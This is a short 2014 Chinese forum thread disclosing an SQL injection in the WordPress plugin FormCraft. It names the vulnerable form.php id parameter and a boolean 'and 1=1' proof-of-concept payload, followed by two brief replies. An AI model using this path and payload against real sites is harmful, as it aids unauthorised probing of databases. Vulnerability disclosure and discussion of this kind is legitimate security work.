90_ 发表于 2014-1-20 14:36:00

WordPress插件formcraft Sql Injection

点:
/wp-content/plugins/formcraft/form.php?id=

PoC: form.php?id=1%20and%20 1=1

Diana 发表于 2014-1-20 18:50:12

:P太俗了~~

契约 发表于 2014-1-20 19:32:41

总算有个能看懂的了,1=1 检测注入:D
页: [1]
查看完整版本: WordPress插件formcraft Sql Injection